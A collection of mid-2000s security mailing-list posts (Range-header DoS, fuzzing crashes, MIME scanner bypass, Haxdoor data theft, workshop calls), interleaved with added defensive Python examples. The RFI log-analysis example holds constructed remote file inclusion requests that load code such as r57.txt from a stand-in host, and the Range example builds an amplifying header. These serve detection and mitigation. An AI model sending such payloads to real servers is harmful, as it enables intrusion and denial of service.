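An aggregator of the kind that would produce a report like the one above, as an added example in Python for this announcement and for the Virus Bulletin article post further up; it is not the Web Honeynet Project's own tooling nor code from the article. It scans Apache combined-format access log lines for query-parameter values that are themselves remote URLs, the tell of a file inclusion attempt against a script that passes the parameter to include()/require(), and tallies them per source IP. The log lines are constructed here with RFC 5737 test addresses and .example hosts, and the parameter names in them are stand-ins rather than claims about any particular application.

```python
"""Pick remote file inclusion (RFI) attempts out of web server access logs and
aggregate them per source IP into a report shaped like the sample above.

Added example for the two RFI posts (the Virus Bulletin article post and the
Web Honeynet Project announcement); not the project's own tooling nor code
from the article. The log lines at the bottom are constructed for the
demonstration (RFC 5737 addresses, .example hosts), and the parameter names
in them are stand-ins, not claims about any specific application.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: client ident user [time] "request" status size "referer" "agent"
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
# A query value that is itself a URL is the tell: these are the schemes PHP's
# include()/require() will fetch when allow_url_include (allow_url_fopen on
# PHP before 5.2) is on.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def rfi_urls_in_request(target):
    """Return the query-parameter values of a request target that are remote URLs.

    parse_qsl percent-decodes once; a second unquote catches the common
    double-encoded form. The trailing '?' seen on the URLs in the report is
    kept as part of the value: attackers add it so that whatever the vulnerable
    script concatenates after the parameter ('/config.php', '.inc') lands in
    the query string of their own server instead of changing the path.
    """
    query = urlsplit(target).query
    return [unquote(v) for _name, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(unquote(v))]


def build_report(log_lines):
    """Per source IP: (ip, hit_count, {included_url: count}), busiest first."""
    hits = defaultdict(Counter)
    for line in log_lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue                      # not a combined-format line; do not guess
        for url in rfi_urls_in_request(m.group('target')):
            hits[m.group('ip')][url] += 1
    report = [(ip, sum(c.values()), dict(c)) for ip, c in hits.items()]
    report.sort(key=lambda row: (-row[1], row[0]))
    return report


def format_report(report):
    """Render build_report() output in the 'IP | Hit Count | Malware (Count), ... |' layout."""
    lines = ['IP | Hit Count | Malware (Count), ... |']
    for ip, total, urls in report:
        cells = ', '.join(f'{u} ({n})' for u, n in sorted(urls.items(), key=lambda kv: -kv[1]))
        lines.append(f'{ip} | {total} | {cells},')
    return '\n'.join(lines)


SAMPLE_LOG = [  # constructed, not captured
    '203.0.113.5 - - [10/Jan/2007:03:14:07 +0000] "GET /components/calendar/index.php?config_path=http://dropsite.example/cmd.gif? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [10/Jan/2007:03:14:09 +0000] "GET /admin/index.php?base_path=http%3A%2F%2Fdropsite.example%2Fcmd.gif%3F HTTP/1.1" 404 301 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [10/Jan/2007:03:15:11 +0000] "GET /forum/viewtopic.php?root_path=http://dropsite.example/r57.txt?? HTTP/1.1" 200 9341 "-" "libwww-perl/5.805"',
    '198.51.100.77 - - [10/Jan/2007:04:02:44 +0000] "GET /includes/lib.inc?lib_dir=http://dropsite.example/cmd.gif? HTTP/1.0" 500 0 "-" "Mozilla/4.0"',
    '198.51.100.77 - - [10/Jan/2007:04:02:45 +0000] "GET /index.php?page=about HTTP/1.0" 200 2048 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [10/Jan/2007:05:30:00 +0000] "GET /index.php?page=http://intra/ HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    print(format_report(build_report(SAMPLE_LOG)))
```

The check is purely syntactic, which is also what the `http://i ntra/` row in the report above shows: any application that legitimately passes a URL in a parameter (redirect targets, feed fetchers) will be counted, so per-parameter or per-host allowlisting belongs in front of anything that turns this output into a block list. On the server side, the setting that takes the whole class away is allow_url_include = Off (PHP 5.2 and later; allow_url_fopen = Off on older PHP), together with never handing user input to include().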

Re: a cheesy Apache / IIS DoS vuln (+a question)

2007-01-08 Thread Gadi Evron
On Wed, 3 Jan 2007, William A. Rowe, Jr. wrote:
> Michal Zalewski wrote:
> > I feel silly for reporting this, but I couldn't help but notice that
> > Apache and IIS both have a bizarro implementation of HTTP/1.1 "Range"
> > header functionality (as defined by RFC 2616). Their implementations allow
> > the same fragment of a file to be requested an arbitrary number of times,
> > and each redundant part to be received separately in a separate
> > multipart/byteranges envelope.
> 
> Batten down the hatches!
> 
> >   (An example would be an "old-fashioned" attack on a server that happens
> >   to host multi-gigabyte ISO files or movies - simply request them
> >   many times and let window scaling do the rest... of course, most
> >   high-profile sites are smart enough to host static HTML and basic layout
> >   elements separately from such bandwidth-intensive and non-essential
> >   content, so it still makes sense to take note of "Range" behavior).
> 
> Seriously, HTTP pipelining can accomplish EXACTLY the same thing with minimal
> pain.  If you have an issue with this behavior, of HTTP, then you have an
> issue with the behavior under FTP or a host of other protocols.  And as you
> say, simple enough to find some 1.5mb pdf's.  But you expect 1gb window sizes
> to actually succeed?
> 
> In 95% of the cases that follow your comment above, although the load may
> be often be distributed between boxes based on computational intensity, it
> is nearly always shoved down the same pipe in the end.
> 
> > Combined with the functionality of window scaling (as per RFC 1323)
> 
> is exactly where your concern should lay - socket kernel-level control of
> unrealistic window scaling, and similar scaling restrictions at the router
> layer.
> 
> With the host of real issues out there in terms of massively parallel DDoS
> infrastructures that abound, this is, as you say, quite a silly report.

Wrong. Any vulnerability, no matter how many others are out there or how
unlikely, is indeed a vulnerability.

As one of the people leading the battle against what you refer to as
"massively parallel DDoS infrastructures", I can tell you I am almost
inclined to giggle here.

Is all you are saying: "YES but mine is better?"

Gadi.
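
The server-side check the quoted exchange turns on, as an added example in Python; this is not code from Apache, IIS or anyone on the thread. It parses the Range header per RFC 2616 section 14.35, measures how many bytes the byte-range set adds up to against the entity size, coalesces duplicated or overlapping ranges, and falls back to ignoring the header (a 200 with the full body, which RFC 2616 permits since Range support is optional) when one request asks for more data than the file holds or for too many parts. MAX_RANGES and MAX_AMPLIFICATION are assumptions picked for the demonstration, not any server's defaults; the sample headers are constructed.

```python
"""Check an HTTP/1.1 Range header for the abuse described in the thread: the
same fragment asked for many times in one request, each copy returned in its
own multipart/byteranges part.

Added example for the thread above; not code from Apache, IIS or any of the
posters. Parsing follows RFC 2616 section 14.35. MAX_RANGES and
MAX_AMPLIFICATION are assumptions chosen for the demonstration, not any
server's defaults; the sample headers at the bottom are constructed.
"""
import re

MAX_RANGES = 32          # assumption: more parts than a real download manager sends
MAX_AMPLIFICATION = 1.0  # assumption: never send more than one copy of the entity

BYTE_RANGE_SPEC = re.compile(r'^\s*(\d*)\s*-\s*(\d*)\s*$')


def parse_byte_ranges(header, size):
    """Resolve a Range header against an entity of `size` bytes.

    Returns None if the header is not a syntactically valid byte-range set
    (RFC 2616: the server then ignores it), [] if no spec is satisfiable
    (416), otherwise a list of inclusive (first, last) tuples in request
    order, duplicates included. Suffix ('-500') and open ('500-') forms are
    resolved here; an individual unsatisfiable spec is dropped.
    """
    if not header.lower().startswith('bytes='):
        return None
    ranges = []
    for spec in header[len('bytes='):].split(','):
        m = BYTE_RANGE_SPEC.match(spec)
        if not m or (m.group(1) == '' and m.group(2) == ''):
            return None
        first, last = m.group(1), m.group(2)
        if first == '':                          # suffix-byte-range-spec: last N bytes
            n = int(last)
            if n == 0 or size == 0:
                continue                         # nothing to serve: unsatisfiable
            ranges.append((max(size - n, 0), size - 1))
            continue
        start = int(first)
        if last != '' and int(last) < start:
            return None                          # last-byte-pos below first-byte-pos: invalid
        if start >= size:
            continue                             # beyond the entity: unsatisfiable
        end = size - 1 if last == '' else min(int(last), size - 1)
        ranges.append((start, end))
    return ranges


def requested_bytes(ranges):
    """Bytes the server would transmit if every range were served as asked."""
    return sum(last - first + 1 for first, last in ranges)


def coalesce(ranges):
    """Merge overlapping or adjacent ranges; repeated ranges collapse to one."""
    merged = []
    for first, last in sorted(ranges):
        if merged and first <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], last))
        else:
            merged.append((first, last))
    return merged


def amplification_factor(header, size):
    """How many entity-sizes the request asks for; 0.0 when nothing would be served."""
    ranges = parse_byte_ranges(header, size)
    if not ranges or size <= 0:
        return 0.0
    return requested_bytes(ranges) / size


def check_range_request(header, size):
    """Decide the response for a Range header on an entity of `size` bytes.

    ('200', None): serve the whole body and ignore Range, which RFC 2616 lets
    a server do at any time; used for invalid headers and for abusive ones
    (too many parts, or more bytes in total than the entity holds).
    ('416', None): no range satisfiable.
    ('206', ranges): serve the coalesced ranges, so repeated fragments go once.
    """
    ranges = parse_byte_ranges(header, size)
    if ranges is None:
        return '200', None
    if not ranges:
        return '416', None
    if len(ranges) > MAX_RANGES or requested_bytes(ranges) > MAX_AMPLIFICATION * size:
        return '200', None
    return '206', coalesce(ranges)


# Constructed samples: a 4 GiB ISO, a resume from the 1 GiB mark, and the
# first GiB requested 64 times in one header.
ISO_SIZE = 4 * 1024 ** 3
RESUME = 'bytes=1073741824-'
ABUSIVE = 'bytes=' + ','.join(['0-1073741823'] * 64)

if __name__ == '__main__':
    for name, hdr in (('RESUME', RESUME), ('ABUSIVE', ABUSIVE)):
        print(name, amplification_factor(hdr, ISO_SIZE), check_range_request(hdr, ISO_SIZE))
```

The amplification figure is the number that matters operationally: a resume request asks for a fraction of the file, while a header that repeats one gigabyte 64 times asks for 16 copies of a 4 GiB entity in a single round trip. Pipelining, as the reply notes, can reach the same totals, but it costs the client one request per copy and is rate-limited per request; a single Range header is not.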



Re: [fuzzing] NOT a 0day! Re: [Full-disclosure] OWASP Fuzzing page

2006-12-14 Thread Gadi Evron
On Thu, 14 Dec 2006, Jerome Athias wrote:
> Gadi Evron wrote:
> > On Tue, 12 Dec 2006, Joxean Koret wrote:
> >   
> >> Wow! That's fun! The so called "Word 0 day" flaw also affects
> >> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> >> with the file:
> >> 
> >
> > This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> > mode, on a mailing list (fuzzing mailing list).
> >
> > I am not sure why I got this 10 times now, I thought the days of these
> > bounces were over. But I am tired of seeing every full-disclosure
> > vulnerability called a 0day anymore.
> >
> > A 0day, whatever definition you use, is used in the wild before people are
> > aware of it.
> It makes sense and I totally agree with you.
> But the fact is that things change (and not always in the right 
> direction :-()... due to society, money, the pursuit of popularity...
> Please also remind us of the sense of the word "hacker", for instance, 
> since nowadays it's often used to speak about "bad guy/blackhat/pirate" - 
> I hope you'll agree that it's not the (our) sense

This battle is not lost. If we call it the right name and talk to the
press using the right terms, it is not lost yet. Maybe it should be, but
it is really confusing when it gets to the professional community.

> 
> /JA
> 



NOT a 0day! Re: [fuzzing] [Full-disclosure] OWASP Fuzzing page

2006-12-14 Thread Gadi Evron
On Tue, 12 Dec 2006, Joxean Koret wrote:
> 
> Wow! That's fun! The so called "Word 0 day" flaw also affects
> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
> with the file:

This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
mode, on a mailing list (fuzzing mailing list).

I am not sure why I got this 10 times now, I thought the days of these
bounces were over. But I am tired of seeing every full-disclosure
vulnerability called a 0day anymore.

A 0day, whatever definition you use, is used in the wild before people are
aware of it.


> 
> [EMAIL PROTECTED] $ abiword 12122006-djtest.doc
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> 
> ** (AbiWord-2.2:24313): WARNING **: Invalid seek
> [EMAIL PROTECTED] $ ooffice 12122006-djtest.doc
> OpenOffice.org lockfile found (/home/joxean/.openoffice/1.1.3/.lock)
> Using existing OpenOffice.org
> Application Errorsh: line 1: crash_report: command not found
> Application Error
> 
> Fatal exception: Signal 6
> Stack:
> /usr/lib/openoffice/program/libsal.so.3[0xb72e13ec]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1579]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1644]
> [0xe420]
> /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt+0x53)[0x8063029]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN23ImplVCLExceptionHandler6signalEP13oslSignalInfo+0xb2)[0xb7df894e]
> /usr/lib/openoffice/program/libvos3gcc3.so(_ZN3vos28_cpp_OSignalHandler_FunctionEPvP13oslSignalInfo+0x18)[0xb750b2f6]
> /usr/lib/openoffice/program/libvos3gcc3.so(_Z24_OSignalHandler_FunctionPvP13oslSignalInfo+0x26)[0xb750b2d6]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1496]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1625]
> [0xe420]
> /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt+0x174)[0x806314a]
> /usr/lib/openoffice/program/libsfx645li.so(_Z18SfxNewHandler_Implv+0x60)[0xb3042e46]
> /usr/lib/openoffice/program/soffice.bin[0x80869cf]
> /usr/lib/openoffice/program/soffice.bin(_Znaj+0x2f)[0x8086b61]
> /usr/lib/openoffice/program/libsw645li.so[0xb1422b5e]
> /usr/lib/openoffice/program/libsw645li.so[0xb1422a69]
> /usr/lib/openoffice/program/libsw645li.so[0xb14243f2]
> /usr/lib/openoffice/program/libsw645li.so[0xb1425022]
> /usr/lib/openoffice/program/libsw645li.so[0xb14212df]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e59c0]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e7f7c]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e813d]
> /usr/lib/openoffice/program/libsw645li.so[0xb12cc513]
> /usr/lib/openoffice/program/libsw645li.so[0xb147cc4e]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN14SfxObjectShell6DoLoadEP9SfxMedium+0xa15)[0xb2eae69d]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl4LoadEPK16SfxObjectFactory+0x563)[0xb2e2d1ef]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x1f3)[0xb2e2eb8d]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x39e)[0xb2e2ed38]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl5StartEv+0x7ca)[0xb2e2c3ba]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN19SfxFrameLoader_Impl4loadERKN3com3sun4star3uno8SequenceINS2_5beans13PropertyValueEEERKNS3_9ReferenceINS2_5frame6XFrameEEE+0x2361)[0xb2f10bb3]
> /usr/lib/openoffice/program/libfwk645li.so[0xb224207a]
> /usr/lib/openoffice/program/libfwk645li.so[0xb22485e4]
> /usr/lib/openoffice/program/libfwk645li.so[0xb223bb1c]
> /usr/lib/openoffice/program/libfwk645li.so[0xb225662c]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15DispatchWatcher23executeDispatchRequestsERKN4_STL6vectorINS0_15DispatchRequestENS1_9allocatorIS3_+0x230c)[0x807a34c]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15OfficeIPCThread22ExecuteCmdLineRequestsERNS_23ProcessDocumentsRequestE+0x17f)[0x807138d]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop11OpenClientsEv+0x1ef6)[0x80681d4]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop16OpenClients_ImplEPv+0x11)[0x8065ee7]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop24LinkStubOpenClients_ImplEPvS1_+0x18)[0x8065ed2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7f49674]
> /usr/lib/openoffice/program/libvcl645li.so(_Z19ImplWindowFrameProcPvP8SalFrametPKv+0x44e)[0xb7f49fc2]
> /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN10SalDisplay21DispatchInternalEventEv+0xd9)[0xb618ad45]
> /usr/lib/o

looking for security community input

2006-12-11 Thread Gadi Evron
Hi guys.

This January a couple hundred people from the net-ops world, anti virus,
anti spam, law enforcement, etc. are getting together.

I'd appreciate if any of you can send me input (off list, if not relevant
to generate discussion) on what the security community at large, rather 
than just the security operations community, sees and is pre-occupied by.

Specifically on subjects such as:
1. Attacks.
2. Law enforcement.
3. DDoS.
4. Botnets.
5. Financial fraud.
6. Spam.
7. End users (bots?)
8. Corporate espionage.
9. Incident response
10. Your topic here?

And what specifically you've had issues with and/or are looking for
solutions for or for what others are doing when it comes to security and
security related issues. Please note, this is about security operations
and Internet-wide threats which affect us all, more than local corporate
security issues.

We will relay information back after the workshop, likely in early
February.

To ask specific questions and/or direct us in specific directions, pick
and choose:
http://isotf.org/isoi2.html

Thanks,

Gadi.



Re: Multiple Vendor Unusual MIME Encoding Content Filter Bypass

2006-12-07 Thread Gadi Evron
On Wed, 6 Dec 2006, Hendrik Weimer wrote:
> Several e-mail virus scanners can be tricked into passing an EICAR
> test file if the following conditions are met:
> 
> 1. the EICAR file is encoded in Base64 including characters not in the
>standard alphabet (e.g. whitespaces) and
> 2. the part containing the EICAR file is nested within one or several
>levels of multipart/mixed content.

Victor Duchovni agreed to let me post what he employs to avoid such
issues. This is in some ways similar to a limited application firewall for
SMTP, which is not spam specific and MIME only. Yes, I know, SMTP
application firewalls are the 4th buzzword down the road, give it a couple 
of years.

Victor's information:

I have a MIME normalizer in front of the A/V engine. Non-conformant
Base64 entities are made conformant or neutered (super-encoded via QP
so that the user receives the base64 text itself as the entity payload).


In:
CT: application/octet-stream
CD: attachment; filename=foo.dat
CTE: base64

AA AA

Out:
CT: application/octet-stream
CD: attachment; filename=foo.dat
CTE: base64



In:
CT: application/octet-stream
CD: attachment; filename=foo.dat
CTE: base64



Out:
CT: text/plain
CD: attachment; filename=mime-source.txt
CTE: quoted-printable

=20AA=01AA


Solves all such problems before the vulnerability is found in the
A/V engine.

The MIME normalizer does more, defending other possible
bypass scenarios, but I am not able to describe the full feature-set
at this time. It was written and deployed in Dec 1999.
--- End quote.

All the above is Victor's.

Gadi Evron.

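As an added example, and not Victor's code (he says above that his normalizer cannot be described in full), here is a small Python normalizer that implements the two behaviours he describes, run against a constructed message that meets both conditions from the advisory: the attachment sits two multipart/mixed levels deep and its base64 text carries characters outside the alphabet. Spaces and tabs inside the base64 are dropped and the entity is re-wrapped (made conformant); any other foreign character turns the part into a quoted-printable text/plain attachment named mime-source.txt (neutered), so the user receives the base64 text itself rather than whatever a lenient decoder would make of it. The sender/recipient addresses, the message layout and the harmless byte string standing in for the EICAR file are all constructed for this example.

```python
import base64
import binascii
import email
import quopri
from email import policy

_ALPHABET = frozenset("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")
_LINE_BREAKS = frozenset("\r\n")
_BLANKS = frozenset(" \t")

# Constructed sample: a harmless byte string stands in for the EICAR test file.
SAMPLE_PAYLOAD = b"constructed sample bytes standing in for the EICAR test file"
_B64 = base64.b64encode(SAMPLE_PAYLOAD).decode("ascii")
# Condition 1 of the advisory: base64 text carrying characters outside the alphabet.
WHITESPACE_MANGLED = " ".join(_B64[i:i + 4] for i in range(0, len(_B64), 4))
FOREIGN_MANGLED = "\x01".join(_B64[i:i + 8] for i in range(0, len(_B64), 8))


def classify_base64(text: str) -> str:
    """'clean': alphabet plus line breaks only (RFC 2045 conformant);
    'whitespace': also spaces/tabs, which can be dropped without ambiguity;
    'foreign': anything else, where lenient decoders disagree on what to do."""
    kind = "clean"
    for ch in text:
        if ch in _ALPHABET or ch in _LINE_BREAKS:
            continue
        if ch in _BLANKS:
            kind = "whitespace"
            continue
        return "foreign"
    return kind


def build_nested_message(encoded_body: str) -> bytes:
    """Constructed test input: the attachment sits two multipart/mixed levels
    deep (condition 2 of the advisory) with `encoded_body` as its base64 text."""
    return (
        "From: sender@example.test\r\nTo: victim@example.test\r\n"
        "MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary=outer\r\n\r\n"
        "--outer\r\nContent-Type: text/plain\r\n\r\ncover text\r\n"
        "--outer\r\nContent-Type: multipart/mixed; boundary=inner\r\n\r\n"
        "--inner\r\nContent-Type: application/octet-stream\r\n"
        "Content-Disposition: attachment; filename=foo.dat\r\n"
        "Content-Transfer-Encoding: base64\r\n\r\n"
        f"{encoded_body}\r\n--inner--\r\n--outer--\r\n"
    ).encode("ascii")


def _set_header(part, name: str, value: str) -> None:
    del part[name]  # no error if the header is absent
    part[name] = value


def normalize(raw_message: bytes) -> bytes:
    """Make every non-conformant base64 entity conformant, or neuter it by
    super-encoding the base64 text itself as a quoted-printable text/plain
    attachment, so the scanner behind this filter never sees ambiguous input."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    for part in msg.walk():
        if part.is_multipart():
            continue
        cte = str(part.get("Content-Transfer-Encoding", "")).strip().lower()
        if cte != "base64":
            continue
        text = part.get_payload()  # the transfer-encoded text, not decoded
        kind = classify_base64(text)
        if kind == "clean":
            continue
        if kind == "whitespace":
            cleaned = "".join(text.split())
            try:
                base64.b64decode(cleaned, validate=True)  # also rejects bad padding
            except binascii.Error:
                pass  # fall through and neuter it
            else:
                part.set_payload("\r\n".join(cleaned[i:i + 76] for i in range(0, len(cleaned), 76)))
                continue
        # Neuter: the recipient gets the raw base64 text as an inert text file.
        _set_header(part, "Content-Type", "text/plain; charset=us-ascii")
        _set_header(part, "Content-Transfer-Encoding", "quoted-printable")
        _set_header(part, "Content-Disposition", 'attachment; filename="mime-source.txt"')
        part.set_payload(quopri.encodestring(text.encode("utf-8", "surrogateescape")).decode("ascii"))
    return msg.as_bytes()


def describe_attachments(raw_message: bytes) -> list:
    """Re-parse and report each leaf part that has a Content-Disposition as
    (content-type, transfer-encoding, decoded payload)."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    return [(p.get_content_type(),
             str(p.get("Content-Transfer-Encoding", "")).lower(),
             p.get_payload(decode=True))
            for p in msg.walk()
            if not p.is_multipart() and p.get("Content-Disposition") is not None]


if __name__ == "__main__":
    for label, body in (("whitespace", WHITESPACE_MANGLED), ("foreign", FOREIGN_MANGLED)):
        print(label, describe_attachments(normalize(build_nested_message(body))))
```

The point of the split between "made conformant" and "neutered" is that whitespace has exactly one sensible interpretation (drop it), while any other foreign byte is where scanner decoders diverge; the filter refuses to guess and hands the scanner, and the user, the literal text instead.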


unreliable vulnerability reports en-masse [was:Re: vulnerability in Symantec products]

2006-10-30 Thread Gadi Evron
On Fri, 27 Oct 2006 [EMAIL PROTECTED] wrote:
> Ummm are you for real? You are posting this as a vulnerability?
> 
> Chances are if they have trojaned or gained privileged access to your 
> workstation it shouldn't be
> too much trouble to alter config of firewall or skirt outbound connectivity.
> 
> Unwise default config, perhaps. Vulnerability ... naah.

Jay, a few months ago someone published a DoS vulnerability that is
triggered when "you run out of hard disk space". Pfft.

Nothing really surprises me anymore. The quality of advisories and QA
people do seems to be dropping, especially when it comes to File
Inclusions. The level of false positives posted in the last couple of
weeks is staggering.

Folks use Google Code Search to find vulns, and don't notice they are
fixed 3 lines above the "bug" and that three lines below, there is
another one.

Last week, one of these File Inclusion vulns worked only if you disabled
two security functions that work by default...

Str0ke from milw0rm (one of the only places, with SecuriTeam, where you
can find free and public exploit code, so they go over all of these much
like we at SecuriTeam do) recently spoke of how this is becoming an issue,
and how all these exploits have to be verified on systems none of us have,
while little to no research went into them to begin with.

Up to this day, vulnerabilities and exploits would be researched to a
level, and released AS-IS. This is fast becoming impractical.

Noam at SecuriTeam wrote a blog entry on much the same, with code samples
(that go on in the comments) called "5 minutes of glory".

http://blogs.securiteam.com/index.php/archives/700

If the S/N ratio of ADVISORIES rather than ML traffic becomes even lower
due to unreliable submissions, our jobs will indeed become much, much harder.

Gadi.

> 
> Jay



[funsec] Haxdoor: UK Police Count 8,500 Victims in Data Theft (So Far) (fwd)

2006-10-27 Thread Gadi Evron
So, here we go. Real-life uses for vulnerabilities.

Below is an example of just ONE "drop-zone" server in the
United States, which has "600 financial companies and banks".

Several gigs of data.

How do these things work?

They get installed by the use of a web vulnerability, an email attachment
or network scanning, utilizing several vulnerabilities.

One drop zone, and all this noise gets made. I am very happy to hear that
the UK police (which are good people) are doing something about this,
however, banks, eCommerce sites, dating sites, etc. all get attacked by
these things, by the users being infected.

These trojan horses use rootkit technology, with a hook, using man in the
middle attacks to bypass the SSL encryption, and steal any HTTPS
credentials they come across.

These things are so wide-spread, this news item made me raise my eye-brow,
at first.

So, knowing full well that security is out of our hands and relies on the
security of our users, and knowing full well that the same technology can be
used to bypass 2-factor authentication, how do organizations handle their
own security, if they are to have clients?

The point is, though, that this is a well planned operation, with new
samples being released with new vulnerabilities to exploit,
constantly. This should not be considered a "one time case" or a "lost
laptop containing private data".

This is what vulnerabilities are about - the damage and operations they
are used for.

Gadi.

-- Forwarded message --
Date: Tue, 24 Oct 2006 21:24:20 GMT
From: Fergie <[EMAIL PROTECTED]>
To: funsec@linuxbox.org
Subject: [funsec] Haxdoor: UK Police Count 8,500 Victims in Data Theft (So Far)

Via InfoWorld.

[snip]

British electronic-crime detectives are investigating a massive data
theft operation that stole sensitive information from 8,500 people in
the U.K. and others in some 60 countries, officials said Tuesday.

In total, cybercriminals targeted 600 financial companies and banks,
according to U.K. authorities, who have worked over the past week to
identify and notify victims.

Through intelligence sources, U.K. police were given several gigabytes
of data -- around 130,00 files -- that came from a server in the U.S.,
said Charlie McMurdie, detective chief inspector for the Specialist
Crime Directorate e-Crime Unit of the London Metropolitan Police. Most
of the data related to financial information, she said.

The data was collected by a malicious software program nicknamed
Haxdoor that infected victims' computers. Some 2,300 machines were
located in the U.K. McMurdie said.

[snip]

More:
http://www.infoworld.com/article/06/10/24/HNukdatatheft_1.html

- ferg


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawg(at)netzero.net
 ferg's tech blog: http://fergdawg.blogspot.com/


___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.



Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

2006-10-25 Thread Gadi Evron
>
> Does anyone have more information on this issue?
>

Yes. SecuriTeam is currently assisting a researcher with reporting this
issue to Yahoo! security.

Yahoo! security responded in record time, as they often do, and are
working to resolve this potential security vulnerability.

An official report with full credit to the researcher who discovered it
will be released when the incident has been resolved.

A similar vulnerability was reported on the mailing lists a few months
ago, which has not been fixed. SecuriTeam assisted the researcher and
Yahoo! responded and fixed the issue in a matter of a day. Yahoo! are very
capable with security vulnerabilities in their software.

Thanks,

Gadi.

> snip
> http://www.securityfocus.com/bid/20625/discuss
> Yahoo! Messenger is prone to a remote buffer-overflow vulnerability
> because it fails to properly bounds-check user-supplied data before
> copying it to an insufficiently sized memory buffer.
> 
> This vulnerability allows remote attackers to execute arbitrary machine
> code in the context of the affected application. Failed exploit attempts
> will likely crash the server, denying further service to legitimate
> users.
> 
> Yahoo! Messenger 8 with Voice is vulnerable.
> snip
> 
> 
> I could not find this vulnerability reported on any other place than
> bugtraq (say Secunia, iDefense, ISC).
> 
> 
> Thanks,
> 
> - Siddhartha
> 




ISOI II - a DA Workshop (announcement and CFP)

2006-10-13 Thread Gadi Evron
[Apologies to those who receive this message multiple times]

The second Internet Security Operations and Intelligence (ISOI) DA
workshop will take place on the 25th and 26th of January, 2007. It will be
hosted by the Microsoft Corporation, in Redmond WA. An after-party dinner
will be hosted by Trendmicro.

This workshop's main topic is BotMaster Operational Tactics - the use of
vulnerabilities and 0day exploits in the wild (by spyware, phishing and
botnets for their businesses).
Secondary subjects include DDoS, phishing and general botnet subjects.

The workshop's purpose is to bring together members of the Internet 
security operations community at large and DA and MWP specifically, and
share information, as well as plan our future operations.
It is open only to the following vetted communities: DA, MWP (and sister
communities such as routesec), OARC, NSP-SEC, FIRST, MAAWG, anti virus 
vetted groups and the honey net project.

Among the attendees are:
Professionals from Internet Service Providers (ISPs), Anti Virus vendors,
Anti Spam vendors and projects, CERT teams, Law Enforcement, Academia,
etc. coming together to work on the most recent technology, intelligence
and operations being done online today for the security of the Internet.

No reporters are allowed.

CFP:
The call for papers is now open to the public. The main subject of
interest is vulnerabilities and 0day exploits used in the wild. Secondary
subjects are DDoS, phishing and general botnet subjects.

Submission is simple, email us directly with your topic and some data to
back it up by December 10th, to [EMAIL PROTECTED]

For more information please visit:
http://isotf.org/isoi2.html

For the agenda of our previous workshop hosted by Cisco Systems, Inc.,
please visit:
http://isotf.org/isoi.html

Gadi Evron,
ISOI/DA coordinator and organizer.



Re: [funsec] Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]

2006-10-09 Thread Gadi Evron
On Wed, 4 Oct 2006, Alexander Sotirov wrote:
> Rewriting the entire function in asm is a lot of unnecessary effort. Why 
> didn't
